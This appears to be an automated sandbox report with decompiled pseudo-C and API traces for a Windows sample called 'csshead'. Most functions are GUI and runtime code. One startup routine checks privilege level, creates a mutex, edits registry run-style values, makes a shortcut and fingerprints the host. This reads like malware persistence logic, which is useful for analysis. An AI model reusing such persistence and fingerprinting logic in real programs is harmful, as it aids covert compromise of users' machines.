0x0042d6f7
0x0042d6f7
0x0042d6fc
0x0042d6ff
0x0042d702
0x0042d705
0x0042d705
0x0042d705
0x0042d70c
0x0042d712
0x0042d718
0x0042d718
0x0042d71a
0x0042d720
0x0042d726
0x0042d72b
0x0042d72c
0x0042d733
0x00000000
0x00000000
0x0042d739
0x0042d740
0x0042d747
0x00000000
0x00000000
0x0042d74b
0x0042d74d
0x0042d753
0x0042d758
0x0042d759
0x0042d760
0x00000000
0x00000000
0x0042d766
0x0042d76c
0x0042d76c
0x0042d76c
0x00000000
0x0042d76c
0x0042d71c
0x0042d71e
0x00000000
0x00000000
0x00000000
0x0042d71e
0x0042d6f3
0x0042d6f5
0x00000000
0x00000000
0x00000000
0x0042d6f5
0x0042d588
0x0042d58a
0x0042d592
0x0042d598
0x0042d5a0
0x0042d5a2
0x0042d5a6
0x0042d5c1
0x0042d5c7
0x0042d5c9
0x0042d605
0x0042d607
0x0042d608
0x0042d60e
0x0042d60f
0x0042d614
0x0042d617
0x0042d61a
0x00000000
0x00000000
0x0042d620
0x0042d63a
0x0042d63b
0x0042d647
0x0042d649
0x0042d64b
0x00000000
0x00000000
0x0042d66a
0x0042d670
0x0042d672
0x00000000
0x00000000
0x0042d67e
0x0042d686
0x0042d68c
0x0042d692
0x00000000
0x00000000
0x0042d698
0x0042d69f
0x00000000
0x00000000
0x0042d6bc
0x0042d6c3
0x0042d6c9
0x0042d6cb
0x00000000
0x00000000
0x0042d6d1
0x0042d6d8
0x00000000
0x00000000
0x0042d6de
0x0042d6e4
0x00000000
0x0042d6e4
0x0042d5d9
0x0042d5db
0x0042d788
0x0042d78a
0x0042d790
0x0042d796
0x00000000
0x0042d796
0x0042d5eb
0x0042d5f0
0x0042d5f3
0x0042d5f6
0x00000000
0x00000000
0x0042d5fc
0x0042d5fd
0x00000000
0x0042d5fd
0x0042d5a8
0x0042d5ab
0x0042d5ae
0x0042d5b1
0x0042d5b5
0x0042d5ba
0x00000000
0x0042d772
0x0042d775
0x0042d775
0x00000000
0x0042d781
0x0042d545
0x0042d54b
0x00000000
0x00000000
0x00000000
0x0042d54b
0x0042d500
0x0042d4c9
0x0042d4d1
0x0042d4d7
0x00000000
0x0042d4d7
0x0042d4b5
0x0042d4b8
0x00000000
0x00000000
0x00000000
0x0042d4b8
0x0042d46b
0x0042d472
0x0042d47d
0x00000000
0x0042d47d
0x0042d45b
0x00000000

APIs

__getptd.LIBCMT ref: 0042D513

Part of subcall function 00425EEB: __amsg_exit.LIBCMT ref: 00425EFB

GetConsoleMode.KERNEL32(00000000,?,00000000,00000001,00000000,?,0042DBB3,00000000,00422655,?,0043D088,00000010,00424FBB,00422655,00000000,00000001), ref: 0042D531
GetConsoleCP.KERNEL32(?,0042DBB3,00000000,00422655,?,0043D088,00000010,00424FBB,00422655,00000000,00000001,00000000,00000000,00000000), ref: 0042D551

Part of subcall function 0042DE77: __isleadbyte_l.LIBCMT ref: 0042DE81

__Stoull.NTSTC_LIBCMT ref: 0042D5EB
__Stoull.NTSTC_LIBCMT ref: 0042D60F
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00422655,00000005,00000000,00000000), ref: 0042D641
WriteFile.KERNEL32(00000000,00422655,00000000,?,00000000), ref: 0042D66A
WriteFile.KERNEL32(00000000,00422655,00000001,?,00000000), ref: 0042D6C3

Part of subcall function 00430224: ___initconout.LIBCMT ref: 00430233
Part of subcall function 00430224: WriteConsoleW.KERNEL32(FFFFFFFE,00000000,00000001,00000000,00000000,00000000,?,0042D72B,?), ref: 00430256

WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0042D831
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0042D90B
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,00000D55,00000000,00000000), ref: 0042D9DB
WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0042DA0C
GetLastError.KERNEL32 ref: 0042DA22
WriteFile.KERNEL32(00000000,?,?,?,00000000,00000000,00000001,00000000,?,0042DBB3,00000000,00422655,?,0043D088,00000010,00424FBB), ref: 0042DA63
GetLastError.KERNEL32(?,0042DBB3,00000000,00422655,?,0043D088,00000010,00424FBB,00422655,00000000,00000001,00000000,00000000,00000000), ref: 0042DA82

Part of subcall function 00429814: IsDebuggerPresent.KERNEL32 ref: 0042FAF6
Part of subcall function 00429814: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0042FB0B
Part of subcall function 00429814: UnhandledExceptionFilter.KERNEL32(06D), ref: 0042FB16
Part of subcall function 00429814: GetCurrentProcess.KERNEL32 ref: 0042FB32
Part of subcall function 00429814: TerminateProcess.KERNEL32(00000000), ref: 0042FB39

Part of subcall function 0042D2B2: SetFilePointer.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?,?,?,0042D4F4,00000000,00000000,00000000,00000002,00000000,00000001), ref: 0042D2F4
Part of subcall function 0042D2B2: GetLastError.KERNEL32(?,0042D4F4,00000000,00000000,00000000,00000002,00000000,00000001,00000000,?,0042DBB3,00000000,00422655,?,0043D088,00000010), ref: 0042D301

Memory Dump Source

Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_csshead.jbxd

Function 00418BA0, Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 233window

APIs

Part of subcall function 00410C90: GetVersionExA.KERNEL32(?,00000000,00000090), ref: 00410CBD

CreatePopupMenu.USER32 ref: 00418C34
GetClientRect.USER32(?,?), ref: 00418C58
GetMenuItemCount.USER32(?), ref: 00418CE3
AppendMenuA.USER32(?,00000800,00000000,00000000), ref: 00418CFF
AppendMenuA.USER32(?,00000000,?,00433984), ref: 00418E6B

Part of subcall function 00410D10: GetVersionExA.KERNEL32(?), ref: 00410D4A

GetMenuItemInfoA.USER32 ref: 00418D6D
AppendMenuA.USER32(?,00000000,00000014,?), ref: 00418D8D
SendMessageA.USER32 ref: 00418DFB
LoadStringA.USER32(00442B94,?,?,000000C8), ref: 00418E2E
GetMenuItemCount.USER32(?), ref: 00418E87
DestroyMenu.USER32(?), ref: 00418E96
MessageBeep.USER32(000000FF), ref: 00418E9E

Strings

, xrefs: 00418DDF

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 00412EE0, Relevance: 19.8, APIs: 13, Instructions: 311window

APIs

CallWindowProcA.USER32(?,?,?,?,?), ref: 00412EFD
GetWindowRect.USER32(?,?), ref: 00412F42
SetRect.USER32(?,00000000,00000000,?,?), ref: 00412F69
FillRect.USER32(00000000,?,00000005), ref: 00412FB0
SetRect.USER32(?,?,?,?,?), ref: 00413009
DrawIconEx.USER32(00000000,?,?,?,?,?,00000000,00000000,00000003), ref: 00413035
SetRect.USER32(?,?,00000000,?,?), ref: 0041304D
GetViewportOrgEx.GDI32(00000000,?), ref: 00413077
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00413090
OffsetRect.USER32(?,?,00000000), ref: 004130A6
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 004130CB
OffsetRect.USER32(?,?,00000000), ref: 004130DF
FillRect.USER32(00000000,?,00000005), ref: 00413107

Part of subcall function 00411330: SetRect.USER32(?,00000000,?,?,?), ref: 00411382

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 004156C0, Relevance: 19.7, APIs: 13, Instructions: 225
window

C-Code - Quality: 100%

			E004156C0(void* __ecx, intOrPtr _a8, long* _a16) {
				signed char _t65;
				signed int _t71;
				signed int _t73;
				signed int _t75;
				struct HWND__* _t76;
				struct HWND__* _t81;
				int _t84;
				signed char _t85;
				int _t93;
				long* _t97;
				long _t98;
				signed char _t104;
				intOrPtr _t108;
				signed int _t121;
				signed int _t123;
				void* _t125;
				intOrPtr _t126;

				_t97 = _a16;
				_t126 = _a8;
				_t125 = __ecx;
				 *_t97 = 0;
				if(_t126 != 0x1b) {
					if(_t126 == 0xd || _t126 == 0x26 || _t126 == 0x28) {
						L42:
						if(( *(_t125 + 0x84) & 0x00000001) != 0 || GetFocus() !=  *(_t125 + 4) || IsWindow( *(_t125 + 0x5c)) == 0 || SendMessageA( *(_t125 + 4), 0x447, 0, 0) == 0xffffffff) {
							L50:
							if(_t126 == 0xd) {
								goto L51;
							}
						} else {
							if(_t126 == 0xd) {
								L51:
								if(( *(_t125 + 0x84) & 0x00000001) != 0) {
									PostMessageA( *(_t125 + 4), 0x448, 0xffffffff, 0);
									 *(_t125 + 0x8c) = 0xffffffff;
									L004140E0(_t125);
								}
							} else {
								_t65 =  *(_t125 + 0x85);
								if(_t65 < 0) {
									 *(_t125 + 0x85) = _t65 & 0x0000007f;
								} else {
									PostMessageA( *(_t125 + 4), 0x100, 0x28, 0);
									 *(_t125 + 0x85) =  *(_t125 + 0x85) | 0x00000080;
								}
								goto L50;
							}
						}
						goto L53;
					} else {
						if(_t126 == 0x25 || _t126 == 0x27) {
							_t104 =  *(_t125 + 0x84);
							_t71 = ( *(_t125 + 0x85) & 0x000000ff) >> 0x00000006 & 0x00000001;
							_t121 = (_t71 ^ 0x00000001) + (_t71 ^ 0x00000001) | 0x00000025;
							_t73 = _t71 + _t71 | 0x00000025;
							if((_t104 & 0x00000001) == 0 || (_t104 & 0x00000010) != 0 || _t126 == _t121 && (_t104 & 0x00000008) != 0) {
								goto L53;
							} else {
								_t98 = 0;
								if(_t126 != _t73) {
									L23:
									if(_t126 == _t121) {
										_t84 = E00411530( *(_t125 + 0x88), _t125,  *(_t125 + 0x88));
										goto L25;
									}
								} else {
									_t108 =  *0x442a58; // 0x0
									if( *((intOrPtr*)(_t108 + 8)) != 1) {
										goto L23;
									} else {
										_t84 = E00411440(_t73, _t125,  *(_t125 + 0x88));
										L25:
										 *(_t125 + 0x8c) = _t84;
										if(_t84 != 0xffffffff) {
											_t98 = 1;
										}
									}
								}
								_t75 =  *((intOrPtr*)(_t125 + 0xc)) - 1;
								if(_t75 >= 0) {
									_t76 =  *( *((intOrPtr*)(_t125 + 8)) + _t75 * 4);
								} else {
									_t76 = 0;
								}
								if(_t98 == 0) {
									goto L53;
								} else {
									PostMessageA(_t76, 0x100, 0x1b, 0);
									if(_t126 != _t121) {
										L38:
										if( *(_t125 + 0x8c) == 0xfffffffe) {
											 *(_t125 + 0x8c) = 0xffffffff;
											E00411630(_t125);
										}
										 *_a16 = 1;
										return 0;
									} else {
										_t123 =  *((intOrPtr*)(_t125 + 0xc)) - 1;
										if(_t123 < 0) {
											goto L38;
										} else {
											while(_t123 >= 0 && _t123 <  *((intOrPtr*)(_t125 + 0xc))) {
												_t81 =  *( *((intOrPtr*)(_t125 + 8)) + _t123 * 4);
												if(_t81 != 0) {
													PostMessageA(_t81, 0x100, 0x1b, 0);
												}
												_t123 = _t123 - 1;
												if(_t123 >= 0) {
													continue;
												} else {
													goto L38;
												}
												goto L54;
											}
											RaiseException(0xc000008c, 1, 0, 0);
											goto L42;
										}
									}
								}
							}
						} else {
							goto L53;
						}
					}
				} else {
					if( *((intOrPtr*)(__ecx + 0xc)) > 1) {
						L53:
						return 0;
					} else {
						_t85 =  *((intOrPtr*)(__ecx + 0x84));
						if((_t85 & 0x00000001) == 0 || (_t85 & 0x00000010) != 0) {
							if(GetFocus() !=  *(_t125 + 4) || IsWindow( *(_t125 + 0x5c)) == 0) {
								goto L53;
							} else {
								SendMessageA( *(_t125 + 4), 0x448, 0xffffffff, 0);
								L004140E0(_t125);
								 *_t97 = 1;
								return 0;
							}
						} else {
							_t93 = SendMessageA( *(__ecx + 4), 0x447, 0, 0);
							if(_t93 == 0xffffffff) {
								_t93 =  *(_t125 + 0x88);
								if(_t93 == 0xffffffff) {
									_t93 = 0;
								}
							}
							SendMessageA( *(_t125 + 4), 0x448, _t93, 0);
							 *_t97 = 1;
							L004117C0(_t125);
							 *(_t125 + 0x84) =  *(_t125 + 0x84) | 0x00000020;
							 *(_t125 + 0x85) =  *(_t125 + 0x85) & 0x0000007f;
							return 0;
						}
					}
				}
				L54:
			}

0x004156c1
0x004156c6
0x004156cc
0x004156ce
0x004156d7
0x0041579b
0x004158d7
0x004158e4
0x00415946
0x00415949
0x00000000
0x00000000
0x00415917
0x0041591a
0x0041594b
0x00415952
0x00415961
0x00415965
0x0041596f
0x0041596f
0x0041591c
0x0041591c
0x00415924
0x00415940
0x00415926
0x00415933
0x00415935
0x00415935
0x00000000
0x00415924
0x0041591a
0x00000000
0x004157b3
0x004157b6
0x004157c8
0x004157d1
0x004157dd
0x004157e0
0x004157e6
0x00000000
0x00415802
0x00415802
0x00415806
0x00415824
0x00415826
0x00415831
0x00000000
0x00415831
0x00415808
0x00415808
0x00415812
0x00000000
0x00415814
0x0041581d
0x00415836
0x00415836
0x0041583f
0x00415841
0x00415841
0x0041583f
0x00415812
0x00415846
0x00415847
0x00415850
0x00415849
0x00415849
0x00415849
0x00415855
0x00000000
0x0041585b
0x0041586b
0x0041586f
0x00415899
0x004158a0
0x004158a4
0x004158ae
0x004158ae
0x004158ba
0x004158c3
0x00415871
0x00415874
0x00415875
0x00000000
0x00415877
0x00415877
0x00415883
0x00415888
0x00415894
0x00415894
0x00415896
0x00415897
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00415897
0x004158d1
0x00000000
0x004158d1
0x00415875
0x0041586f
0x00415855
0x00000000
0x00000000
0x00000000
0x004157b6
0x004156dd
0x004156e1
0x00415977
0x0041597a
0x004156e7
0x004156e7
0x004156ef
0x00415757
0x00000000
0x0041576f
0x0041577c
0x00415784
0x0041578c
0x00415795
0x00415795
0x004156f5
0x00415708
0x0041570d
0x0041570f
0x00415718
0x0041571a
0x0041571a
0x00415718
0x00415728
0x0041572c
0x00415732
0x00415737
0x0041573e
0x0041574b
0x0041574b
0x004156ef
0x004156e1
0x00000000

APIs

SendMessageA.USER32(?,00000447,00000000,00000000), ref: 00415708
SendMessageA.USER32(?,00000448,00000000,00000000), ref: 00415728

Part of subcall function 004117C0: GetFocus.USER32 ref: 004117D2
Part of subcall function 004117C0: SetFocus.USER32(?), ref: 004117E2

GetFocus.USER32 ref: 0041574E
IsWindow.USER32(?), ref: 00415761
SendMessageA.USER32(?,00000448,000000FF,00000000), ref: 0041577C
RaiseException.KERNEL32(C000008C,00000001,00000000,00000000), ref: 004158D1

Part of subcall function 00411530: GetClientRect.USER32(?,?), ref: 00411569
Part of subcall function 00411530: GetMenuItemCount.USER32(?), ref: 00411573
Part of subcall function 00411530: SendMessageA.USER32(?,00000417,?,?), ref: 004115BD
Part of subcall function 00411530: SendMessageA.USER32(?,0000041D,?,?), ref: 004115E0

Part of subcall function 00411440: GetClientRect.USER32(?,?), ref: 00411479
Part of subcall function 00411440: GetMenuItemCount.USER32(?), ref: 00411498
Part of subcall function 00411440: SendMessageA.USER32(?,00000417,?,?), ref: 004114C6
Part of subcall function 00411440: SendMessageA.USER32(?,0000041D,?,?), ref: 004114E9

PostMessageA.USER32(?,00000100,0000001B,00000000), ref: 0041586B
PostMessageA.USER32(00000000,00000100,0000001B,00000000), ref: 00415894

Part of subcall function 00411630: GetParent.USER32(?), ref: 00411640
Part of subcall function 00411630: SendMessageA.USER32(00000000,0000040C,00000000,00000000), ref: 00411656
Part of subcall function 00411630: GetVersionExA.KERNEL32(?), ref: 0041169F
Part of subcall function 00411630: LoadLibraryA.KERNEL32(comctl32.dll), ref: 004116D6
Part of subcall function 00411630: GetProcAddress.KERNEL32(00000000,DllGetVersion), ref: 004116EF
Part of subcall function 00411630: FreeLibrary.KERNEL32(00000000), ref: 0041170A
Part of subcall function 00411630: SendMessageA.USER32(00000000,0000041D,00000000,?), ref: 0041174F
Part of subcall function 00411630: PostMessageA.USER32(00000000,0000042B,00000000,00000000), ref: 00411797
Part of subcall function 00411630: PostMessageA.USER32(?,00000100,00000028,00000000), ref: 004117AA

GetFocus.USER32 ref: 004158E6
IsWindow.USER32(?), ref: 004158F5
SendMessageA.USER32(?,00000447,00000000,00000000), ref: 0041590C
PostMessageA.USER32(?,00000100,00000028,00000000), ref: 00415933
PostMessageA.USER32(?,00000448,000000FF,00000000), ref: 00415961

Part of subcall function 004140E0: IsWindow.USER32(?), ref: 00414100
Part of subcall function 004140E0: IsWindow.USER32(?), ref: 00414119
Part of subcall function 004140E0: SetFocus.USER32(?), ref: 00414123
Part of subcall function 004140E0: SendMessageA.USER32 ref: 00414141

Memory Dump Source

Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_csshead.jbxd

Function 00412B40, Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 295

APIs

DeleteDC.GDI32(00000000), ref: 00412B8A
SetBkColor.GDI32(00000000,00808080), ref: 00412CF7
DeleteObject.GDI32(?), ref: 00412D77
DeleteObject.GDI32(?), ref: 00412D89
DeleteDC.GDI32(?), ref: 00412D9B
DeleteDC.GDI32(00000000), ref: 00412DA6
FillRect.USER32(?,?,?), ref: 00412DE0
DeleteDC.GDI32(?), ref: 00412E82
DeleteObject.GDI32(?), ref: 00412E8D
DeleteDC.GDI32(?), ref: 00412E94

Strings

(, xrefs: 00412BB8

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 00408D0C, Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 230
threadsleep

C-Code - Quality: 86%

			E00408D0C(void* __ecx, void* __edx, void* __eflags, signed int _a4) {
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				void* _v28;
				struct tagPOINT _v36;
				struct _SECURITY_ATTRIBUTES _v52;
				char _v309;
				void* _t60;
				signed int _t62;
				signed char _t66;
				CHAR* _t72;
				intOrPtr _t128;
				signed int _t133;
				signed int _t139;
				signed char _t164;
				void* _t166;
				void* _t171;
				intOrPtr _t183;
				void* _t188;
				void* _t191;

				_t191 = __eflags;
				_t166 = __ecx;
				 *0x40b114 = E0040458C(0);
				E00402574(_t54 | 0xffffffff);
				 *0x40a064 = E004044F0(_t191);
				 *0x40a068 = E004042D4(GetCurrentProcess());
				_t60 = E004044F0(_t191);
				_t192 = _t60 - 0x3c;
				if(_t60 >= 0x3c) {
					_t62 = E004042D4(GetCurrentProcess());
					__eflags = _t62 - 3;
					_t2 = _t62 == 3;
					__eflags = _t2;
					asm("sbb eax, eax");
					 *0x40a034 =  ~(_t62 & 0xffffff00 | _t2);
				} else {
					_t164 = E004041CC();
					asm("sbb eax, eax");
					 *0x40a034 =  ~_t164;
				}
				_t66 = E0040453C(GetCurrentProcess());
				asm("sbb eax, eax");
				 *0x40a058 =  ~_t66;
				E004079BC(_t192);
				_v28 = LocalAlloc(0, 0x14);
				E00404408( &_v52, _v28);
				_t72 =  *0x40a0d8; // 0x401cc8
				 *0x40a054 = CreateMutexA( &_v52, 0, _t72);
				LocalFree(_v28);
				_t77 = _a4;
				asm("sbb eax, eax");
				_v12 =  ~(_a4 & 0xffffff00 |  *_t77 == 0x0000002b);
				_t80 = _a4;
				asm("sbb eax, eax");
				_v16 =  ~(_a4 & 0xffffff00 |  *((char*)(_t80 + 1)) == 0x0000002b);
				_a4 = _a4 + 2;
				E00401B50();
				E00408BFC();
				E00407984();
				E004089D4();
				E00407A44(_t166);
				 *0x40b408(0x40be04);
				 *0x40b514 = E004047AC(_a4, 0x40b510);
				_v24 = E00407304(0x40b61c);
				asm("sbb eax, eax");
				if( ~( ~_v24) == 0) {
					E0040744C(0x40b61c);
				}
				if(_v12 != 0 || _v16 != 0) {
					E0040471C(_a4, 0x2ee0, 0);
				}
				if(_v12 != 0) {
					E00401308( &_v309, _a4);
					 *((char*)(_t188 + E004012DC( &_v309) - 0x135)) = 0;
					E0040133C( &_v309, ".lnk");
					E0040471C( &_v309, 0, 0);
					if( *0x40a034 == 0) {
						E00404A1C(0x80000001,  &_v309);
					} else {
						E00404A1C(0x80000002,  &_v309);
					}
				}
				asm("sbb eax, eax");
				if( ~( ~_v12) == 0) {
					asm("sbb eax, eax");
					if( ~( ~_v16) == 0) {
						_t183 =  *0x40b514; // 0x0
						E00408CF8(_a4, _t183);
					}
				}
				if(_v12 == 0 || _v24 == 0) {
					E0040744C(0x40b61c);
					E00408B98(0x40b518);
					E00408B6C();
					E00404BA0(0x40b719);
					 *0x40b780 = E00405468();
					 *0x40b651 = E00405468();
					_v8 = E00403B80(5, 0x19, 0xd);
					E00401308(0x40b752, _v8);
					E00401440(_v8);
					__eflags =  *0x40a034;
					if( *0x40a034 == 0) {
						__eflags = 0;
						_t181 =  *0x40a260; // 0x4021a4
						E00408064(0x80000001, 0, _t181);
					} else {
						_t181 =  *0x40a260; // 0x4021a4
						E00408064(0x80000002, 0, _t181);
					}
					__eflags =  *0x40b621;
					if( *0x40b621 == 0) {
						L24:
						asm("sbb eax, eax");
						__eflags =  ~( ~_v12);
						if(__eflags == 0) {
							_t133 =  *0x40b784; // 0x0
							__eflags = _t133 &  *0x40a070;
							if((_t133 &  *0x40a070) != 0) {
								__eflags =  *0x40b621 - 0x5a;
								if( *0x40b621 > 0x5a) {
									GetCursorPos( &_v36);
								}
							}
							_t181 = 0;
							__eflags = 0;
							E0040471C(_a4, 0x2ee0, 0);
						}
						E00407474(0x40b61c, __eflags);
						goto L30;
					} else {
						_t139 =  *0x40b621; // 0x0
						_v20 = _t139;
						__eflags = _v20;
						if(_v20 == 0) {
							goto L24;
						} else {
							goto L23;
						}
						do {
							L23:
							Sleep(0x3e8);
							_v20 = _v20 - 1;
							__eflags = _v20;
						} while (_v20 != 0);
						goto L24;
					}
				} else {
					_t181 = _a4;
					E00401308(0x40b518, _a4);
					E00408B6C();
					L30:
					E004038DC(0x40be04);
					 *0x40c380 = 0;
					E004038EC(0x40be04);
					_pop(_t171);
					E00405640(0x40c384, _t171, _t181);
					_t128 =  *0x40b64d; // 0x0
					 *0x40c355 = _t128;
					E00401308(0x40c254, 0x40b625);
					E004084A4();
					_push(0);
					return RtlExitUserThread();
				}
			}

0x00408d0c
0x00408d0c
0x00408d1c
0x00408d24
0x00408d2e
0x00408d3e
0x00408d43
0x00408d48
0x00408d4b
0x00408d63
0x00408d68
0x00408d6b
0x00408d6b
0x00408d70
0x00408d72
0x00408d4d
0x00408d4d
0x00408d54
0x00408d56
0x00408d56
0x00408d7d
0x00408d84
0x00408d86
0x00408d8b
0x00408d9a
0x00408da3
0x00408da8
0x00408dba
0x00408dc3
0x00408dc9
0x00408dd4
0x00408dd6
0x00408dd9
0x00408de5
0x00408de7
0x00408dea
0x00408dee
0x00408df3
0x00408df8
0x00408dfd
0x00408e02
0x00408e0c
0x00408e1f
0x00408e2e
0x00408e36
0x00408e3c
0x00408e43
0x00408e43
0x00408e4c
0x00408e5e
0x00408e5e
0x00408e67
0x00408e72
0x00408e82
0x00408e96
0x00408ea8
0x00408eb4
0x00408ed3
0x00408eb6
0x00408ec1
0x00408ec1
0x00408eb4
0x00408edd
0x00408ee3
0x00408eea
0x00408ef0
0x00408ef2
0x00408efb
0x00408efb
0x00408ef0
0x00408f04
0x00408f28
0x00408f32
0x00408f37
0x00408f41
0x00408f4b
0x00408f55
0x00408f65
0x00408f70
0x00408f78
0x00408f7d
0x00408f84
0x00408f9a
0x00408f9c
0x00408fa7
0x00408f86
0x00408f88
0x00408f93
0x00408f93
0x00408fac
0x00408fb3
0x00408fd7
0x00408fdc
0x00408fe0
0x00408fe2
0x00408fe4
0x00408fef
0x00408ff1
0x00408ff3
0x00408ffa
0x00409000
0x00409000
0x00408ffa
0x0040900b
0x0040900b
0x00409010
0x00409010
0x0040901a
0x00000000
0x00408fb5
0x00408fb5
0x00408fba
0x00408fbd
0x00408fc1
0x00000000
0x00000000
0x00000000
0x00000000
0x00408fc3
0x00408fc3
0x00408fc8
0x00408fce
0x00408fd1
0x00408fd1
0x00000000
0x00408fc3
0x00408f0c
0x00408f11
0x00408f14
0x00408f19
0x0040901f
0x00409024
0x0040902c
0x00409036
0x0040903b
0x00409041
0x00409046
0x0040904b
0x0040905a
0x00409062
0x00409067
0x00409072
0x00409072

APIs

Part of subcall function 004044F0: GetVersionExA.KERNEL32(0000009C), ref: 0040451A

GetCurrentProcess.KERNEL32 ref: 00408D33

Part of subcall function 004042D4: OpenProcessToken.ADVAPI32(?,00000008,?), ref: 004042EC
Part of subcall function 004042D4: GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 0040430E
Part of subcall function 004042D4: GetLastError.KERNEL32 ref: 00404322
Part of subcall function 004042D4: GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,?,?), ref: 00404358
Part of subcall function 004042D4: GetSidSubAuthorityCount.ADVAPI32(?), ref: 0040436E
Part of subcall function 004042D4: GetSidSubAuthority.ADVAPI32(?,?), ref: 00404393
Part of subcall function 004042D4: CloseHandle.KERNEL32(?), ref: 004043F3

GetCurrentProcess.KERNEL32 ref: 00408D5D
GetCurrentProcess.KERNEL32 ref: 00408D77

Part of subcall function 0040453C: GetCurrentProcess.KERNEL32 ref: 00404555
Part of subcall function 0040453C: IsWow64Process.KERNEL32(00000000,?), ref: 0040456F

Part of subcall function 004079BC: RtlInitializeCriticalSection.NTDLL(0040BE04), ref: 00407A14
Part of subcall function 004079BC: RtlInitializeCriticalSection.NTDLL(0040C234), ref: 00407A2E

LocalAlloc.KERNEL32(00000000,00000014), ref: 00408D94

Part of subcall function 00404408: InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 0040441F
Part of subcall function 00404408: SetSecurityDescriptorDacl.ADVAPI32(?,000000FF,00000000,00000000), ref: 00404437
Part of subcall function 00404408: ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(00401CB4,00000001,?,00000000), ref: 00404453
Part of subcall function 00404408: GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?), ref: 00404478
Part of subcall function 00404408: SetSecurityDescriptorSacl.ADVAPI32(?,?,?,?), ref: 00404498
Part of subcall function 00404408: LocalFree.KERNEL32(?), ref: 004044AC

CreateMutexA.KERNEL32(?,00000000,00401CC8), ref: 00408DB4
LocalFree.KERNEL32(?), ref: 00408DC3

Part of subcall function 00408BFC: RegOpenKeyExA.ADVAPI32(80000002,00402174,00000000,00020119,?), ref: 00408C1B

Part of subcall function 00407984: GetVolumeInformationA.KERNEL32(004021D0,00000000,00000000,0040B110,?,?,00000000,00000000), ref: 004079A5

Part of subcall function 004089D4: GetVolumeInformationA.KERNEL32(004021D0,00000000,00000000,?,?,?,00000000,00000000), ref: 004089F4

Part of subcall function 00407A44: GetModuleFileNameA.KERNEL32(00000000,?,00000401), ref: 00407A67

RtlInitializeCriticalSection.NTDLL(0040BE04), ref: 00408E0C

Part of subcall function 004047AC: CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004047D9
Part of subcall function 004047AC: CreateFileA.KERNELBASE(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004047FB
Part of subcall function 004047AC: GetFileSize.KERNEL32(?,00000000), ref: 00404810
Part of subcall function 004047AC: ReadFile.KERNEL32(?,?,?,?,00000000), ref: 0040483F
Part of subcall function 004047AC: CloseHandle.KERNEL32(?), ref: 00404849

Part of subcall function 00407304: RegOpenKeyExA.ADVAPI32(80000002,004021A4,00000000,000F003F,?), ref: 00407331
Part of subcall function 00407304: RegOpenKeyExA.ADVAPI32(80000001,004021A4,00000000,000F003F,?), ref: 00407352

Part of subcall function 0040471C: CreateThread.KERNEL32(00000000,00000000,Function_00004608,?,00000000,?), ref: 00404777
Part of subcall function 0040471C: SetThreadPriority.KERNEL32(?,000000F1), ref: 00404786
Part of subcall function 0040471C: CloseHandle.KERNEL32(?), ref: 00404790

Part of subcall function 00404A1C: RegDeleteValueA.ADVAPI32(?,?), ref: 00404A55

Part of subcall function 00408B98: SHGetSpecialFolderPathA.SHELL32(00000000,?,00000026,000000FF), ref: 00408BB2
Part of subcall function 00408B98: SHGetSpecialFolderPathA.SHELL32(00000000,?,0000001A,000000FF), ref: 00408BD6

Part of subcall function 00408B6C: CreateThread.KERNEL32(00000000,00000000,Function_00008AA4,00000000,00000000,?), ref: 00408B81
Part of subcall function 00408B6C: CloseHandle.KERNEL32(?), ref: 00408B8E

Part of subcall function 00404BA0: GetComputerNameA.KERNEL32(?,00000101), ref: 00404BC3
Part of subcall function 00404BA0: RegOpenKeyExA.ADVAPI32(80000002,00402174,00000000,00020119,?), ref: 00404C01
Part of subcall function 00404BA0: GetVolumeInformationA.KERNEL32(004021D0,00000000,00000000,?,?,?,00000000,00000000), ref: 00404D40

Part of subcall function 00405468: GetSystemTime.KERNEL32(?), ref: 00405472

